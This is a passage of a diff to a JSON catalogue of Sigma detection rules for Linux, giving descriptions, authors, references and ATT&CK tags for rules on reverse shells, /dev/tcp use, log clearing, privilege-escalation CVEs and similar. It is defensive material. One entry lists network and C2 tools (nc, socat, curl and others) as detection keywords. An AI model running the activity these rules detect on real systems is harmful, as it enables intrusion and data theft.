"https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_susp_network_scan_by_port.yml" ], "tags": [ "attack.discovery", "attack.t1046" ] }, - "uuid": "3761e026-f259-44e6-8826-719ed8079408", - "value": "Linux Network Service Scanning - Auditd" - }, - { - "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2019/10/21", - 
"falsepositive": [ - "Legitimate administrator or user uses network sniffing tool for legitimate reasons." - ], - "filename": "lnx_auditd_network_sniffing.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_sniffing.yml" - ], - "tags": [ - "attack.credential_access", - "attack.discovery", - "attack.t1040" - ] - }, - "uuid": "f4d3748a-65d1-4806-bd23-e25728081d01", - "value": "Network Sniffing - Linux" - }, - { - "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager.\nMicrosoft Azure, and Microsoft Operations Management Suite.\n", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2021/09/17", - "falsepositive": [ - "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." 
- ], - "filename": "lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", - "https://github.com/Azure/Azure-Sentinel/pull/3059", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.initial_access", - "attack.execution", - "attack.t1068", - "attack.t1190", - "attack.t1203" - ] - }, - "uuid": "045b5f9c-49f7-4419-a236-9854fb3c827a", - "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd" - }, - { - "description": "Detects password policy discovery commands", - "meta": { - "author": "Ömer Günal, oscd.community, Pawel Mazur", - "creation_date": "2020/10/08", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "lnx_auditd_password_policy_discovery.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md", - "https://attack.mitre.org/techniques/T1201/", - "https://linux.die.net/man/1/chage", - "https://man7.org/linux/man-pages/man1/passwd.1.html", - "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1201" - ] - }, - "uuid": "ca94a6db-8106-4737-9ed2-3e3bb826af0a", - "value": "Password Policy Discovery" - }, - { - "description": "Detects a reload or a start of a service.", - "meta": { - "author": "Jakob Weinzettl, oscd.community", - "creation_date": "2019/09/23", - "falsepositive": [ - "Installation of legitimate service.", 
- "Legitimate reconfiguration of service." - ], - "filename": "lnx_auditd_pers_systemd_reload.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1543/002/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1543.002" - ] - }, - "uuid": "2625cc59-0634-40d0-821e-cb67382a3dd7", - "value": "Systemd Service Reload or Start" - }, - { - "description": "Detects adversary creating screen capture of a desktop with Import Tool.\nHighly recommended using rule on servers, due to high usage of screenshot utilities on user workstations.\nImageMagick must be installed.\n", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/09/21", - "falsepositive": [ - "Legitimate use of screenshot utility" - ], - "filename": "lnx_auditd_screencapture_import.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", - "https://attack.mitre.org/techniques/T1113/", - "https://linux.die.net/man/1/import", - "https://imagemagick.org/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ] - }, - "uuid": "dbe4b9c5-c254-4258-9688-d6af0b7967fd", - "value": "Screen Capture with Import Tool" - }, - { - "description": "Detects adversary creating screen capture of a full with xwd. 
Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/09/13", - "falsepositive": [ - "Legitimate use of screenshot utility" - ], - "filename": "lnx_auditd_screencaputre_xwd.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture", - "https://attack.mitre.org/techniques/T1113/", - "https://linux.die.net/man/1/xwd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ] - }, - "uuid": "e2f17c5d-b02a-442b-9052-6eb89c9fec9c", - "value": "Screen Capture with Xwd" - }, - { - "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", - "meta": { - "author": "Igor Fits, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Legitimate administrative activity" - ], - "filename": "lnx_auditd_split_file_into_pieces.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1030" - ] - }, - "uuid": "2dad0cba-c62a-4a4f-949f-5f6ecd619769", - "value": "Split A File Into Pieces - Linux" - }, - { - "description": "Detects embeding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/09/11", - "falsepositive": [ - 
"Unknown" - ], - "filename": "lnx_auditd_steghide_embed_steganography.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1027/003/", - "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.003" - ] - }, - "uuid": "ce446a9e-30b9-4483-8e38-d2c9ad0a2280", - "value": "Steganography Hide Files with Steghide" - }, - { - "description": "Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/09/11", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_steghide_extract_steganography.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1027/003/", - "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.003" - ] - }, - "uuid": "a5a827d9-1bbe-4952-9293-c59d897eb41b", - "value": "Steganography Extract Files with Steghide" - }, - { - "description": "Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.\nThis includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.\nThese commands match a few techniques from the tactics \"Command and Control\", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), 
Data Encoding (T1132)\n", - "meta": { - "author": "Marie Euler", - "creation_date": "2020/05/18", - "falsepositive": [ - "Admin or User activity" - ], - "filename": "lnx_auditd_susp_c2_commands.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/Neo23x0/auditd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml" - ], - "tags": [ - "attack.command_and_control" - ] - }, - "uuid": "f7158a64-6204-4d6d-868a-6e6378b467e0", - "value": "Suspicious C2 Activities" - }, - { - "description": "Detects relevant commands often related to malware or hacking activity", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/12/12", - "falsepositive": [ - "Admin activity" - ], - "filename": "lnx_auditd_susp_cmds.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "Internal Research - mostly derived from exploit code including code in MSF", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_cmds.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.004" - ] - }, - "uuid": "1543ae20-cbdf-4ec1-8d12-7664d667a825", - "value": "Suspicious Commands Linux" - }, - { - "description": "Detects program executions in suspicious non-program folders related to malware or hacking activity", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/01/23", - "falsepositive": [ - "Admin activity (especially in /tmp folders)", - "Crazy web applications" - ], - "filename": "lnx_auditd_susp_exe_folders.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml" - ], - "tags": [ - "attack.t1587", - "attack.t1584", - "attack.resource_development" - ] - }, - 
"uuid": "a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc", - "value": "Program Executions in Suspicious Folders" - }, - { - "description": "Detects commandline operations on shell history files", - "meta": { - "author": "Mikhail Larin, oscd.community", - "creation_date": "2020/10/17", - "falsepositive": [ - "Legitimate administrative activity", - "Legitimate software, cleaning hist file" - ], - "filename": "lnx_auditd_susp_histfile_operations.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.003" - ] - }, - "uuid": "eae8ce9f-bde9-47a6-8e79-f20d18419910", - "value": "Suspicious History File Operations - Linux" - }, - { - "description": "Detects a creation of systemd services which could be used by adversaries to execute malicious code.", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2022/02/03", - "falsepositive": [ - "Admin work like legit service installs." 
- ], - "filename": "lnx_auditd_systemd_service_creation.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1543/002/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1543.002" - ] - }, - "uuid": "1bac86ba-41aa-4f62-9d6b-405eac99b485", - "value": "Systemd Service Creation" - }, - { - "description": "Detects System Information Discovery commands", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/09/03", - "falsepositive": [ - "Legitimate administrative activity" - ], - "filename": "lnx_auditd_system_info_discovery.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1082/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ] - }, - "uuid": "f34047d9-20d3-4e8b-8672-0a35cc50dc71", - "value": "System Information Discovery - Auditd" - }, - { - "description": "Detects system information discovery commands", - "meta": { - "author": "Ömer Günal, oscd.community", - "creation_date": "2020/10/08", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "lnx_auditd_system_info_discovery2.yml", - "level": "informational", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ] - }, - "uuid": "1f358e2e-cb63-43c3-b575-dfb072a6814f", - "value": "System and Hardware Information Discovery" - }, - { - "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", - "meta": { - "author": "Igor Fits, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Legitimate administrative activity" - ], - "filename": "lnx_auditd_system_shutdown_reboot.yml", - "level": "informational", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml" - ], - "tags": [ - "attack.impact", - "attack.t1529" - ] - }, - "uuid": "4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f", - "value": "System Shutdown/Reboot - Linux" - }, - { - "description": "Detects extracting of zip file from image file", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/09/09", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_unzip_hidden_zip_files_steganography.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1027/003/", - "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.003" - ] - }, - "uuid": 
"edd595d7-7895-4fa7-acb3-85a18a8772ca", - "value": "Steganography Unzip Hidden Information From Picture File" - }, - { - "description": "Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2019/10/21", - "falsepositive": [ - "Admin activity" - ], - "filename": "lnx_auditd_user_discovery.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_user_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ] - }, - "uuid": "9a0d8ca0-2385-4020-b6c6-cb6153ca56f3", - "value": "System Owner or User Discovery" - }, - { - "description": "Detects possible command execution by web application/web shell", - "meta": { - "author": "Ilyas Ochkov, Beyu Denis, oscd.community", - "creation_date": "2019/10/12", - "falsepositive": [ - "Admin activity", - "Crazy web applications" - ], - "filename": "lnx_auditd_web_rce.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "Personal Experience of the Author", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_web_rce.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "c0d3734d-330f-4a03-aae2-65dacc6a8222", - "value": "Webshell Remote Command Execution" - }, - { - "description": "Detects suspicious shell commands used in various Equation Group scripts and tools", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/04/09", - "falsepositive": [ - "Unknown" - ], - 
"filename": "lnx_apt_equationgroup_lnx.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml" - ], - "tags": [ - "attack.execution", - "attack.g0020", - "attack.t1059.004" - ] - }, - "uuid": "41e5c73d-9983-4b69-bd03-e13b67e9623c", - "value": "Equation Group Indicators" - }, - { - "description": "Detects buffer overflow attempts in Unix system log files", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/01", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_buffer_overflows.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_buffer_overflows.yml" - ], - "tags": [ - "attack.t1068", - "attack.privilege_escalation" - ] - }, - "uuid": "18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781", - "value": "Buffer Overflow Attempts" - }, - { - "description": "Detects specific commands commonly used to remove or empty the syslog", - "meta": { - "author": "Max Altgelt", - "creation_date": "2021/09/10", - "falsepositive": [ - "Log rotation" - ], - "filename": "lnx_clear_syslog.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_clear_syslog.yml" - ], - "tags": [ - "attack.impact", - "attack.t1565.001" - ] - }, - "uuid": "e09eb557-96d2-4de9-ba2d-30f712a5afd3", - "value": "Commands to Clear or Remove the Syslog - Builtin" - }, - { - 
"description": "Detects suspicious modification of crontab file.", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2022/04/16", - "falsepositive": [ - "Legitimate modification of crontab" - ], - "filename": "lnx_crontab_file_modification.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_crontab_file_modification.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.003" - ] - }, - "uuid": "af202fd3-7bff-4212-a25a-fb34606cfcbe", - "value": "Modifying Crontab" - }, - { - "description": "Detects the use of tools that copy files from or to remote systems", - "meta": { - "author": "Ömer Günal", - "creation_date": "2020/06/18", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "lnx_file_copy.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1105/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_file_copy.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1105" - ] - }, - "uuid": "7a14080d-a048-4de8-ae58-604ce58a795b", - "value": "Remote File Copy" - }, - { - "description": "Detects the ld.so preload persistence file. 
See `man ld.so` for more information.", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/05/05", - "falsepositive": [ - "Rare temporary workaround for library misconfiguration" - ], - "filename": "lnx_ldso_preload_injection.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://man7.org/linux/man-pages/man8/ld.so.8.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_ldso_preload_injection.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.006" - ] - }, - "uuid": "7e3c4651-c347-40c4-b1d4-d48590fdf684", - "value": "Code Injection by ld.so Preload" - }, - { - "description": "Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2022/05/04", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_nimbuspwn_privilege_escalation_exploit.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/", - "https://github.com/Immersive-Labs-Sec/nimbuspwn", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_nimbuspwn_privilege_escalation_exploit.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ] - }, - "uuid": "7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8", - "value": "Nimbuspwn Exploitation" - }, - { - "description": "Detects potential PwnKit exploitation CVE-2021-4034 in auth logs", - "meta": { - "author": "Sreeman", - "creation_date": "2022/01/26", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_pwnkit_local_privilege_escalation.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - 
"https://twitter.com/wdormann/status/1486161836961579020", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_pwnkit_local_privilege_escalation.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548.001" - ] - }, - "uuid": "0506a799-698b-43b4-85a1-ac4c84c720e9", - "value": "PwnKit Local Privilege Escalation" - }, - { - "description": "Detects shellshock expressions in log files", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/14", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_shellshock.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shellshock.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "c67e0c98-4d39-46ee-8f6b-437ebf6b950e", - "value": "Shellshock Expression" - }, - { - "description": "Clear command history in linux which is used for defense evasion.", - "meta": { - "author": "Patrick Bareiss", - "creation_date": "2019/03/24", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_shell_clear_cmd_history.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md", - "https://attack.mitre.org/techniques/T1070/003/", - "https://www.hackers-arise.com/single-post/2016/06/20/Covering-your-BASH-Shell-Tracks-AntiForensics", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_clear_cmd_history.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.003" - ] - }, - "uuid": "fdc88d25-96fb-4b7c-9633-c0e417fdbd4e", - "value": "Clear Command History" - }, - { - "description": "Detects suspicious shell commands indicating the information 
gathering phase as preparation for the Privilege Escalation.", - "meta": { - "author": "Patrick Bareiss", - "creation_date": "2019/04/05", - "falsepositive": [ - "Troubleshooting on Linux Machines" - ], - "filename": "lnx_shell_priv_esc_prep.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/", - "https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/", - "https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_priv_esc_prep.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.004" - ] - }, - "uuid": "444ade84-c362-4260-b1f3-e45e20e1a905", - "value": "Privilege Escalation Preparation" - }, - { - "description": "Detects suspicious shell commands used in various exploit codes (see references)", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/08/21", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_shell_susp_commands.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html", - "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb", - "http://pastebin.com/FtygZ1cg", - "https://artkond.com/2017/03/23/pivoting-guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.004" - ] - }, - "uuid": "2aa1440c-9ae9-4d92-84a7-a9e5f5e31695", - "value": "Suspicious Activity in Shell Commands" - }, - { - "description": "Detects suspicious log entries in Linux log files", - "meta": { - 
"author": "Florian Roth", - "creation_date": "2017/03/25", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_shell_susp_log_entries.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_log_entries.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1", - "value": "Suspicious Log Entries" - }, - { - "description": "Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/04/02", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_shell_susp_rev_shells.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://alamot.github.io/reverse_shells/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_rev_shells.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.004" - ] - }, - "uuid": "738d9bcf-6999-4fdb-b4ac-3033037db8ab", - "value": "Suspicious Reverse Shell Command Line" - }, - { - "description": "Detects space after filename", - "meta": { - "author": "Ömer Günal", - "creation_date": "2020/06/17", - "falsepositive": [ - "Typos" - ], - "filename": "lnx_space_after_filename_.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1064", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_space_after_filename_.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "879c3015-c88b-4782-93d7-07adf92dbcb7", - "value": "Space After Filename" - }, - { - "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", - "meta": { - "author": "Florian Roth", - "creation_date": 
"2019/10/15", - "falsepositive": [ - "Unlikely" - ], - "filename": "lnx_sudo_cve_2019_14287_user.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://www.openwall.com/lists/oss-security/2019/10/14/1", - "https://access.redhat.com/security/cve/cve-2019-14287", - "https://twitter.com/matthieugarin/status/1183970598210412546", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_sudo_cve_2019_14287_user.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.t1548.003", - "cve.2019.14287" - ] - }, - "uuid": "7fcc54cb-f27d-4684-84b7-436af096f858", - "value": "Sudo Privilege Escalation CVE-2019-14287 - Builtin" - }, - { - "description": "Detects suspicious command with /dev/tcp", - "meta": { - "author": "frack113", - "creation_date": "2021/12/10", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_susp_dev_tcp.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/", - "https://book.hacktricks.xyz/shells/shells/linux", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_dev_tcp.yml" - ], - "tags": [ - "attack.reconnaissance" - ] - }, - "uuid": "6cc5fceb-9a71-4c23-aeeb-963abe0b279c", - "value": "Suspicious Use of /dev/tcp" - }, - { - "description": "Detects suspicious command sequence that JexBoss", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/08/24", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_susp_jexboss.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://www.us-cert.gov/ncas/analysis-reports/AR18-312A", - 
